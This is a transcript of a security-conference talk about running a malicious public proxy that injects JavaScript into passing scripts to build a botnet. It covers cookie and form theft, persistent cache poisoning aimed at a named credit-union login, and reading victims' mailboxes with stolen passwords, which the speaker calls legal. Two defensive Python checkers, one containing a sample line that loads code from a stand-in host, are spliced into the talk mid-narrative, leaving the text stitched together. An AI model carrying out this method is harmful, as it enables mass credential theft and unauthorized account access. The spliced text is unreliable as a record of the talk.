Thank you for coming to this session, Owning Bad Guys and Mafia Using JavaScript. I hope you enjoy the topic. But before starting, I would like to introduce myself and my country. I work in a small company called Informática 64 in Spain. I'm also a Microsoft MVP in Enterprise Security. And I live in Spain. Do you know Spain? Have you been to Spain any time in your life? If not, you have to go and visit our country. This is Madrid, the city in which I live. As you can see, the city that never sleeps, but it's smaller than New York. And there are a lot of great places in Spain that you have to visit. This is the Sagrada Família in Barcelona, one of the most beautiful churches in the world, as you can see. And of course, there are other places that you might like to visit. This is Ibiza, a small island on which I'm going to stay tomorrow. So if you want to rest and discover a different Spain, it's very close to you. It's in Europe, just across the ocean. And of course, if you are a brave man, you can visit other cities with other parties. This is Pamplona. How many of you have been running with the bulls any time in your life? There is only one rule: if you drink, don't run. That's the only rule. The rest is easy. You only need to run faster than the bull. It's very easy to do. And of course, if you like other parties, we've got something special. This is the Tomatina. It's a battlefield with tomatoes, one day long. I'm not sure about the story behind this party, but you only need to throw tomatoes. That's all. It's quite interesting. Wow, we are Spaniards, you know. Well, let's start with today's topic. Today's topic is quite simple: let's create a botnet. That's all. But from the beginning, we had a lot of problems, a lot of problems with it. I guess that many of you have been thinking about creating a botnet at some time in your life. How many of you have been thinking about it, about creating a botnet? How many of you did it? I did it.
Well, the idea of creating a botnet is quite interesting, but of course, like you, I'm lazy. I'm from Spain, so it's normal. So we are lazy. This is a nice picture. I would like to show you this picture. Let me use the zoom. I would like to show you this picture because these Spanish people needed a power supply, and they are using flip-flops to connect it across the swimming pool. It's incredible. This is more or less how we used to do things in Spain. So that's the idea of creating the botnet. We wanted to create the botnet, but we were lazy. We have no money, you know? We have no zero-days. We aren't the FBI or the NSA, so we cannot intercept the communications for free. And of course, we are not Google, Apple, or Microsoft, who are running all the devices around the world. And you know, we are Spanish, so we needed to do something different from the beginning. So the idea of creating the botnet was quite simple. We thought, okay, let them be infected. Let's do something that allows the bots to infect themselves. So the only thing that we wanted is that they wanted to be infected. Quite simple. In the end, if you think about this topic, it's very useful, and the malware industry has been using it over the last five or ten years with rogue antivirus and social engineering tricks. So why not make a botnet using the same trick? So the idea of creating the botnet is just to create a man-in-the-middle attack. There are so many man-in-the-middle attacks that can be used in different scenarios. Of course, if we are in a network, we can use something like ARP spoofing, or we can use rogue DHCP in IPv4 or IPv6 networks. Man-in-the-middle attacks in IPv6 networks: we are going to publish a new tool, a new FOCA, which is the Evil FOCA, to perform man-in-the-middle attacks in IPv6 networks just by pointing and clicking. Quite simple. And of course, if you are able to manage the DNS, you can do the man-in-the-middle attack.
But it's quite complicated if you are thinking about the internet, because you have to deal with a lot of providers, internet providers and networks. So it's difficult to use on the internet. One of the most used on the internet several years ago is the man-in-the-browser, in which just an add-on is installed in the browser, an add-on like a browser helper object in Internet Explorer. And there are a lot of examples of malware that have used this trick. We've got a lot of malware from Russia using this trick. This is very useful, and it works so well that they need special files to configure the Trojan to attack all the different banks. This is a very ancient banking Trojan using an XML file to configure the man-in-the-browser to control all the different web pages from different banks. Quite simple, and it works very well. But we needed to code it in something and deal with antivirus systems, managing detection programs. So we decided that it was very complicated for us and we needed something easier. So we talked about the man-in-the-tab, or JavaScript-in-the-middle. The idea is quite simple. If you are able to run your JavaScript in one tab, you can do a lot of things. You can access the code, you can modify the HTML, you can access the form fields, you can even manage the cookies that are not supposed to be managed, like HTTP-only cookies, using different tricks, and so on. In fact, there is a very well-known project, which is BeEF, the Browser Exploitation Framework project, that allows you to do a lot of things just by installing a small piece of JavaScript code in a browser. So the idea is just to do cache poisoning. The problem is that we needed to configure this on the internet, and it's quite complicated. You want to infect a lot of bots on the network. So we were thinking about how to do it easily, and we did this. So the idea is how to create a JavaScript botnet from scratch, and it's quite simple. First of all, we thought about Tor nodes, and the idea with Tor nodes is quite simple.
If you are the last one in the line, you will be able to access all the content; you will be able to intercept all communications. The problem when we tried to create the rogue Tor node was that they are using some security tests to discover who is modifying the DNS answers, or who is having some special files, and so on. And we were detected, as you can see. So we thought, well, it's too complicated. We need to detect when they are sending the test and create an exception for the test. No, too difficult. We are Spanish. The next thing that we did is just to create a proxy. To create a proxy is quite simple, because a proxy is not a big infrastructure like the Tor network, in which all are connected. A proxy server is just a standalone server that people decide to connect to. So the idea is that if you read all the manuals on the internet about how to be anonymous, the first thing is: connect to any proxy server on the internet. So, anyway. It is very interesting because it's a man-in-the-middle schema. So if we are a proxy server on the internet and people decide to connect to the internet through our proxy server, we will be able to collect all the data and infect all the browsers. So we did it. The first thing that we need to do is just to rent a server on the internet. Of course, you have to take care about what kind of server you are going to use. Don't use any US-based server, not even in Amazon. Remember what happened with WikiLeaks. Not in Megaupload. It's better if you select any country in which there are no laws. So we were renting servers in Iraq, Afghanistan, Kazakhstan... Spain. Then one, sorry. Once you start, once you rent a server, you only need to configure something which is very simple: Apache web server and Squid proxy. And the idea is that with this server we were going to infect all JavaScript files with one small piece of code, two lines only.
So when the user connects to our proxy server, we go to the website, we get the response page, okay, and the response page has a JavaScript file. Then we retrieve the original JavaScript, and then we add only two lines to load the payload, a new payload. We didn't want to use any payload that is very well known on the internet, like BeEF. So we just coded two lines and installed those two lines in all the JavaScript files that went across our proxy server. So in the end, you only need to do this. First of all, we created a rewrite program to add that line of code. So we need to configure this option in Squid proxy. And then we added the non-expiration policy in Apache, because once we infect a JavaScript file in the web browser, we want it to be there forever. Then the code that we needed to create is just this. It's a Perl script, as you can see. And the only thing that we are doing is: we retrieve the file using wget, we copy it into our file system, and then we append our pasarela JavaScript file to the JavaScript. And then, of course, we send the JavaScript, the new JavaScript, to the client using a print. It's a very small piece of code. It's full of command injection vulnerabilities, but it works. The JavaScript is just this. It's a small piece of code, and we are just connecting to the control panel. And the only check that we do is just that we are running only one instance of the payload in every tab. So simple. And of course we didn't want to do anything bad to good people. So we created a special notice on the web page of our server saying the following: "The following proxy server is being used for security research. All JavaScript files will be infected and all your data will be collected. If you want to be safe, don't use this proxy server. If you know that, don't send sensitive information. After all, you continue at your own risk." So we published this. So if you don't want to lose your passwords, if you don't want to be infected, don't use our proxy.
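The two ingredients just described, a JavaScript file that picks up extra lines while crossing the proxy and a response that the browser is told to keep forever, are both visible from the client side. The following is an added example (not code from the talk or from its authors) of a check a defender can run against any proxy they are asked to trust: it fetches one script URL directly and through the proxy, diffs the two bodies, and computes how long the proxied copy would stay in a cache. The 30-day threshold, the `proxy.invalid` host, the `loadRemote` call in the sample and the sample headers are constructed assumptions for the demo.

```python
"""Rogue-proxy integrity check: added example, not code from the talk.

Fetches one JavaScript URL twice, once directly and once through a
candidate proxy, then (1) diffs the two bodies to surface anything the
proxy appended and (2) inspects the proxied response's caching headers,
because a tampered file that the browser may keep indefinitely outlives
the proxy session itself. Threshold, URLs and sample data are assumptions.
"""
import difflib
import email.utils
import hashlib
import time
import urllib.request
from typing import Dict, List, Optional, Tuple

# Assumed policy: a script the browser may reuse for more than 30 days is
# worth a second look when it arrived through an untrusted proxy.
FAR_FUTURE_SECONDS = 30 * 24 * 3600


def fetch(url: str, proxy: Optional[str] = None, timeout: float = 10) -> Tuple[bytes, Dict[str, str]]:
    """Return (body, lower-cased headers) for url, optionally via an HTTP proxy."""
    proxies = {"http": proxy, "https": proxy} if proxy else {}
    opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))
    with opener.open(url, timeout=timeout) as resp:
        return resp.read(), {k.lower(): v for k, v in resp.headers.items()}


def cache_lifetime_seconds(headers: Dict[str, str], now: Optional[float] = None) -> Optional[int]:
    """Seconds a cache may reuse the response (Cache-Control wins over Expires).

    Returns None when neither header states an explicit lifetime.
    """
    for directive in headers.get("cache-control", "").split(","):
        d = directive.strip().lower()
        if d in ("no-store", "no-cache"):
            return 0
        if d.startswith("max-age="):
            try:
                return max(0, int(d[len("max-age="):]))
            except ValueError:
                return 0
    expires = headers.get("expires")
    if not expires:
        return None
    try:
        expires_at = email.utils.parsedate_to_datetime(expires).timestamp()
    except (TypeError, ValueError):
        return 0  # an unparsable Expires (e.g. "0") counts as already expired
    date = headers.get("date")
    try:
        base = email.utils.parsedate_to_datetime(date).timestamp() if date else (now or time.time())
    except (TypeError, ValueError):
        base = now or time.time()
    return max(0, int(expires_at - base))


def compare_js(direct: bytes, proxied: bytes, proxied_headers: Dict[str, str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: List[str] = []
    if hashlib.sha256(direct).hexdigest() != hashlib.sha256(proxied).hexdigest():
        findings.append("body differs between direct and proxied fetch")
        diff = difflib.unified_diff(
            direct.decode("utf-8", "replace").splitlines(),
            proxied.decode("utf-8", "replace").splitlines(),
            lineterm="",
        )
        for line in diff:  # report only lines the proxy added
            if line.startswith("+") and not line.startswith("+++"):
                findings.append("added by proxy: " + line[1:])
    lifetime = cache_lifetime_seconds(proxied_headers)
    if lifetime is not None and lifetime > FAR_FUTURE_SECONDS:
        findings.append(f"proxied copy cacheable for {lifetime} s (> {FAR_FUTURE_SECONDS} s)")
    return findings


def check_url(url: str, proxy: str) -> List[str]:
    """Live check: fetch url directly and through proxy, then compare."""
    direct_body, _ = fetch(url)
    proxied_body, proxied_headers = fetch(url, proxy)
    return compare_js(direct_body, proxied_body, proxied_headers)


# Constructed sample: a clean file and what a proxy-modified copy might look like.
DIRECT_JS = b"function greet(name) { return 'hi ' + name; }\n"
PROXIED_JS = DIRECT_JS + b"/* constructed: two lines appended in transit */\nloadRemote('http://proxy.invalid/c.js');\n"
PROXIED_HEADERS = {
    "content-type": "application/javascript",
    "date": "Sat, 28 Jul 2012 10:00:00 GMT",
    "expires": "Thu, 31 Dec 2037 23:59:59 GMT",  # far-future: the tampered copy stays cached
}

if __name__ == "__main__":
    for finding in compare_js(DIRECT_JS, PROXIED_JS, PROXIED_HEADERS):
        print("-", finding)
```

Run `check_url("http://example.invalid/app.js", "http://<proxy-host>:<port>")` against a proxy you are evaluating; the offline sample at the bottom reproduces both symptoms the talk relies on, a body with extra lines and a response that would sit in the cache for decades. A clean, well-configured origin still may set long lifetimes, so the cache finding is a prompt to look at the body, not proof of tampering on its own.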
That's quite simple. It's a good security policy. No, no. Actually, in the army, you've got the same security policies: "One in the following and security side is for temporary loading and unloading. At your own risk." This is a web page from army.mil. So it's the same security policy. So it's legal. So the next thing that we need to do is just to make our proxy server public. So we copy our IP address and publish the IP address and the port number on a proxy server list, as you can see, Xroxy. And then just let the internet do its magic. And as you can see, in a few days, we got 1,110 different results about our IP address, because all the proxy server lists are copying each other. So if you publish your IP address in one proxy server list, they copy the same IP address to all the proxy server lists. Which is funny, because in one hour, in one day, you can have a lot of bots. So the next thing that we did is just to create a small piece of payload. So the first one is just cookie stealing. We were running our JavaScript inside. We didn't want to deal with HTTPS connections. We didn't want to deal with secure cookies. We didn't want to deal with HTTP-only cookies. So we just copied the normal cookies, the unsecured cookies, and sent the cookies to our control panel just using a GET. Then we created a small payload to grab all the form fields. The idea is that we hook the submit function, copy all the information in the fields, and send the field values to our control panel. And that's all. Just enjoy. Doing this, in one day, we were able to get 5,000 bots, which is not bad. No pay-per-install, not creating any special polymorphic malware, not doing anything, just publishing one IP address on the internet. We are from Spain, you know? So the question is, who the hell is using this kind of service on the internet? How many of you are using this kind of service on the internet? No. If you read all the manuals, if you want to be anonymous, use an anonymous proxy server.
If you want to be more anonymous, use more than one anonymous proxy server, which is cool because you can be infected by more than one proxy server. And the idea is that the kind of people who are using those services are, of course, bad people. All the things that we were able to collect were bad people doing bad things. So of course, the first thing that we discovered is the Nigerian scammers. We collected all the information. Of course, we also collected usernames and passwords. But we advised them. So it's all legal. So once we got the password, we got into the mailboxes of those people. And well, this is one of my favorites. There were a lot of people doing this. This is one of my favorites. As you can see, the email name is Royal Hotel England at hotmail.co.uk. And that guy was creating a spam campaign trying to scam people with a visa, a visa scheme. The idea is he was offering the victims a special visa to get a job in the UK. Of course, this is the email. He was asking for money, 275 pounds. And he was asking for money. And a lot of people were suspicious, saying, okay, I respect your kind of information, but show me the money. Show me the job before. Show me the job and then I send the money. Of course, if the guy was suspicious, the scammer wasn't continuing with the scam. But others weren't so suspicious. So in the end, they were sending all the information needed to create the visa. As you can see: passport, application form, my résumé, passport, passport, passport, high-quality picture for the passport in the UK, fingerprints, as you can see, and so on. A lot of people sending... this is the easiest way of identity theft that I've seen in my life, for sure. And if you've got all this information, you probably can create your own mule to use in malware, in banking malware. So quite simple. Another one, which is one of my favorites, is this guy. Well, how do you see this guy? This is a profile in a social network for having a flirt and that kind of thing.
How do you look at that guy? How many of you really think that that girl needs to search for a boy on the internet? Well, it was very suspicious for us at the beginning. So we decided to collect the username and password of this profile and analyze what she was doing. And in the end, as you can see, this ancient queen here is searching for a relationship and dating. She's from Texas and she's 30. But she has another profile in another network. In this case, she is from New Zealand, she's 31 and she's an Aries, and so on. And in another profile, she lives in Virginia. Any person from Virginia who has seen this girl? And of course, the most wonderful thing is that in other profiles, she looks completely different. She is from Germany. So in the end, we decided to get into the email box, and we were reading the information that she was storing there. Well, that guy, of course, is not a girl. He is a boy. He was collecting chats of people who were in contact with that profile. So those profiles are for phishing victims. And this is one of my favorite chats, in which KK Bill is the girl. This is supposed to be the girl. And Fiat 176 is the victim. "Hello, sweetie." "Hello, my sweet mouse." I think we need an "a". The second one is nice. "How are you doing?" "I want to say doing." Well, in the chat, in the chat, you can see, I'm sorry, in the chat, they are discussing the details of their love. And the details are 700 euros that need to be sent in exchange for the naked picture. I don't know what kind of picture that one is. And the point is that this boy, this predator, is a multitasking scammer. So he is chatting with different people at the same time. And he also fails. And in the middle of the chat, he started to chat in German, I think so. It's crazy. So we were inside the email box. And it's quite nice, because he has all the victims very well classified in his email box. And there is a folder with all the chats in which he is working right now.
And we were searching for mails asking for money through Western Union. And as you can see, there were 158 messages, searching, asking for money through Western Union. So quite simple. And the mails were like this. "Hello, sweetie. Why do you have no naked picture?" "Hello, baby. I don't know about my bank manager, asking me that the other city and country is not possible. It's not possible. Now we can redo." Of course, she is asking for money that needs to be transferred to a different country, in which that fake profile is supposed to be living. And she gets angry: "Fuck it, stop playing games on me. I gave you the right address and was your manager." Well, you can imagine the rest of the emails. Another of the scammers in that test that we did was someone very weird, because he was doing something strange with dogs. We weren't sure about what he was doing with dogs, and why he needed to be using a proxy server on the internet, an anonymous proxy server on the internet. So we decided to use the username and password to get into the email box, and we discovered something very hard. We discovered a picture. Please, this is a warning: if you love animals, please don't look at this picture, because this is the picture. He was selling this fake Yorkshire, because in the end he was selling the same Yorkshire around the world. So it's the most profitable Yorkshire in the world. He was just publishing the same picture in a lot of places, selling dogs and making money from it. Of course, we discovered psychos. This is the control panel, how the control panel looks. And as you can see, this guy was searching on XNXX, searching for "mother", "rape sister", "violent rape", "violence". So we were about to send this IP address to the police, because this guy is not normal. Also, people trying to be anonymous, a lot of people trying to be anonymous, and the first thing that they were doing, it was just to test if they were anonymous.
The problem is that if you are using a proxy server, you are anonymous to the end page, but not to the proxy server. So the proxy server can track you any time. It's quite simple. So, okay, you are anonymous. We don't know that you are from the States. Okay, your IP address is this, and we know the real IP address. So it's quite simple. A lot of cases of people doing the same, trying to be anonymous. This is the worst case we discovered. It's a guy trying to make money out of reading blog posts. It's supposed to be a business. You read the blog posts of anyone around the world and you will be paid for it. And after one month, he was able to earn 24 bucks. So I'm not sure that it is such a good business right now. Of course, we discovered a lot of people hacking, doing phishing, and so on. And this is one of our favorites. As you can see in the control panel, we've got the local files on the website that has been hacked. This is a web shell. And the idea of this web shell... of course, we connect to the site, to the website, and it had the face, as you can see, the email address of the hacker. So it was anonymous, but you've got the email address. I don't understand this very well. But the problem is that this hacker was using a web shell, and the web shell was hacked with a JavaScript. Do you know? Probably you know that there are a lot of web shells on the internet with a small piece of JavaScript that are copying your web shell, and you are trojanized by this web shell. This web shell was trojanized, and of course, it was trojanized by a JavaScript file. So when the JavaScript file goes through our proxy server, we infected that JavaScript, and then we owned the web shell of the hacker. So in the end, the hacker who was hacking was hacked. Also, one of our favorite things is that once you are using a proxy server, if you disconnect from the proxy server but you don't erase your cache, you will be infected for the rest of the time, because the JavaScript is in your cache.
So the idea is that we discovered that some intranet applications were using JavaScript from the internet. So we were able to discover, to infect that JavaScript, and then we infected the intranet application. In this case, this is a guy from Mexico. He wanted to browse for some porn on the internet, and then he disconnected from the proxy server, but he was infected, and as you can see, this is an internal server. We weren't able to connect to it, but there is an ERP application with data, and of course, a lot of information about the user and the password and so on. But we couldn't connect to that intranet because it is not public on the internet. And of course, porn. A lot of porn, people searching for porn. Porn is the business, believe me, not hacking: porn, porn, porn. We even discovered this, this is a very nice story, in which in a church, in a Catholic church, this painting by monks was discovered, from seven centuries before: they were painting penises. It's true. So we were collecting URLs, and we discovered a lot of porn URLs, of course, and a lot of usernames and passwords that have been sold on the internet, of course. But the weirdest page is Chatroulette. Believe me, if you have never watched that website, Chatroulette is completely different. So in the end, once we've got the JavaScript botnet, once we've got the bots infected with JavaScript, you can create a special payload. And of course, if you are connecting through a proxy server, probably you won't connect to your banking system, or you are not going to connect to your social profile, or you are not going to connect to your intranet or your personal website or whatever. But if you don't clean your cache, you are infected: if someone forces you to load a JavaScript file which is in the web page that you are going to visit after having used the proxy server, then you will be hacked.
So in this example, we've got LinkedIn.com, and as you can see, there are some scripts that are loaded in JavaScript on the LinkedIn website. So if you are using the proxy server, then we can create a special payload forcing you to download these JavaScript files. Then these JavaScript files will be infected. Once you disconnect and connect to LinkedIn, our payload will be executed. It's so simple. So we can create special targeted attacks on several websites, collecting passwords of people who were using a proxy server before on the internet. It's quite, quite simple. So you only need to select the target, whatever: bank, social network, intranet; analyze the files that are going to be loaded by this website; and force the victim to load this file when the victim is connected to the proxy server. It's quite simple. So I wanted to do a demo for real, but I would like to show you the control panel, how it looks, because of course we turned off the proxy server on the internet some time ago, but for Black Hat and DEF CON I created a new control panel, but I didn't publish this proxy server on the internet. But after delivering the talk at Black Hat, I don't know why, someone published it on the internet. So we configured this proxy for only 10 parallel connections, only for 10 parallel connections. And right now, this morning, I'm going to show you the bots. We view zombies, old zombies. And as you can see, if we search for the date, 28, which is today, today we started to receive a lot of bots, from different countries, a lot from the States, Brazil, whatever. And we've got a lot of information right now collected from them. We didn't want to do it. We didn't publish the IP address, believe me. But the demo that I would like to show you is more or less this. I wanted to do the demo with them. And let me show the website, which is members.ccul.org. This is the California Credit Union League.
As you can see, this website is perfect for a targeted attack because it's an HTTP website in which there is a login form which is going to send the credentials to an HTTPS web server. But we can inject a JavaScript file very easily in the HTTP website, hook the form, and collect the username and password from this website. So the only thing that we need to do in our control panel is analyze the target and select one file. In this example, I select members.ccul.org, script, gataq, jataq.javascript, as you can see. And then in our control panel we create some special payload. So we go to the control panel, and you can see we've got preset attacks in which you can configure what is of interest for you. And in the California Credit Union League, the only thing that we need to do is to force the download of this file. So the guy who is using our proxy server, who is watching porn and is infected, will be downloading this file to the cache. He will be watching porn, hacking websites, whatever. But at the same time, he will be downloading this JavaScript file for the targeted attack. So then, when he disconnects, in this case selecting not to be connected anymore, the JavaScript file which is in the cache will be infected with our payload, because we downloaded it before. And this file is not out of date. So the browser will be using it. So in the end, after the guy connects to the website, sending the information, that form will be hooked, and we are going to be able to retrieve all this data in our control panel. It's so simple, so easy to do and very profitable. So some thoughts about our JavaScript botnet. In this example we didn't worry at all about doing something special with the HTTPS connection. We didn't worry about pre-cached objects, using the attack or using special tricks to force the expiration of the objects that are previously in the cache.
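The property that makes the credit-union page "perfect for a targeted attack" is a structural one: a login form and the scripts around it are served over plain HTTP, so the HTTPS action on the form protects nothing that a man-in-the-middle proxy can already rewrite before submission. The following is an added example (not code from the talk) of a small audit a site owner or pentester can run over a login page to flag exactly that pattern, plus the related case of a script tag fetched over HTTP. The `example.invalid` hosts and the sample HTML are constructed.

```python
"""Login-page transport audit: added example, not the talk's code.

Given a page URL and its HTML, flags the pattern the talk describes: a
password form served over plain http (even when its action is https) and
script tags fetched over http. Both give a man-in-the-middle proxy a place
to rewrite the page or its scripts before the browser ever reaches TLS.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urljoin, urlsplit


class _LoginPageParser(HTMLParser):
    """Collects forms (with whether they carry a password field) and script sources."""

    def __init__(self, page_url: str) -> None:
        super().__init__()
        self.page_url = page_url
        self.forms: List[Dict[str, object]] = []
        self.scripts: List[str] = []
        self._form: Optional[Dict[str, object]] = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # boolean attrs arrive as None
        if tag == "form":
            # Resolve relative actions against the page so the scheme is explicit.
            self._form = {"action": urljoin(self.page_url, a.get("action", "")), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True
        elif tag == "script" and a.get("src"):
            self.scripts.append(urljoin(self.page_url, a["src"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_login_page(page_url: str, html: str) -> List[str]:
    """Return findings for a page; an empty list means no transport weakness found."""
    findings: List[str] = []
    page_scheme = urlsplit(page_url).scheme.lower()
    parser = _LoginPageParser(page_url)
    parser.feed(html)
    for form in parser.forms:
        if not form["has_password"]:
            continue  # search boxes etc. are not the concern here
        action = str(form["action"])
        if page_scheme != "https":
            findings.append(
                f"password form on a {page_scheme} page: the form and its scripts can be "
                f"rewritten in transit, so the action ({action}) gives no protection"
            )
        elif urlsplit(action).scheme.lower() != "https":
            findings.append(f"password form posts over plain http: {action}")
    for src in parser.scripts:
        if urlsplit(src).scheme.lower() == "http":
            findings.append(f"script loaded over http: {src}")
    return findings


# Constructed sample resembling the shape described in the talk: an http login
# page whose form posts to https and which pulls one of its scripts over http.
SAMPLE_URL = "http://members.example.invalid/login"
SAMPLE_HTML = """<html><head>
<script src="/script/common.js"></script>
<script src="https://cdn.example.invalid/lib.js"></script>
</head><body>
<form action="https://secure.example.invalid/auth" method="post">
  <input name="user"><input type="password" name="pass"><input type="submit">
</form>
<form action="/search"><input name="q"></form>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_login_page(SAMPLE_URL, SAMPLE_HTML):
        print("-", finding)
```

The fix the audit points at is the one the talk's own reasoning implies: serve the whole login page, and every script it loads, over HTTPS (and redirect the HTTP origin there), so that there is no plaintext hop on which a proxy can append lines or hook the submit handler. Re-running the same HTML with an `https://` page URL returns no findings, since the relative script path then resolves to HTTPS as well.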
And we didn't want to do something with the HTTPS connection because we didn't want to raise any alert. So we... and of course we didn't have any Flame digital certificate, and Moxie was very busy tweeting, so we couldn't contact him to create the special digital certificate. And the good point of it is that we did it in only one day. So in one day we were able to configure the proxy server, configure Apache, publish the IP address, create the JavaScript, and collect all this information. So if we were able to do this in only one day, the problem is: how many of you think that governments, intelligence services, bad guys aren't doing the same on the internet? The question is, how many of you think that only one of those proxy servers on the internet is secure? Only one. How many of you think that only one of those proxy servers is secure? No one? Secure? I don't think so. Secure. No, one that is not going to affect you or collect your data. The one you run is not an anonymous proxy server; it's yours. It's completely different. So in the end, using a proxy server on the internet is a very bad idea, but we've got thousands and thousands and thousands of web pages on the internet telling people: if you want to be anonymous, use a proxy server on the internet. So we are going to have this problem for a long time, a long time, a long time. So don't use it. So, some protections. Of course, this is a man-in-the-middle schema, and it's a man-in-the-middle schema in which you decide to be hacked, because you configure your web browser to use that man-in-the-middle, that proxy server. So you have to think twice if it's worth it to be using that proxy server. And of course the problem is with Tor networks, but right now we've got more news about fake Tor networks, Tor nodes, or rogue Tor nodes on the internet than fake or rogue proxy servers on the internet, and I don't know why.
And of course, after using this kind of service, if you need to do this for whatever reason, you have to take care and clean all the information that you download from the internet; take special care with that machine. If it's possible, use a new virtual machine and burn it after using it, throw it in the trash, whatever you want. And of course VPNs are not a silver bullet, because in this case we were able to discover a lot of people connecting to a personal VPN to be outside of the network in which they were connecting, and then from the VPN connecting to a proxy server, and in the end it's possible to infect the client in any case. So take care of it. And that's all. Tomorrow I'm going to be delivering a new talk in Sky Talks at 17:00 about how to do a domain pull-the-plug attack, and if you want to ask any question, I'm going to be in the Q and A room. Thank you very much.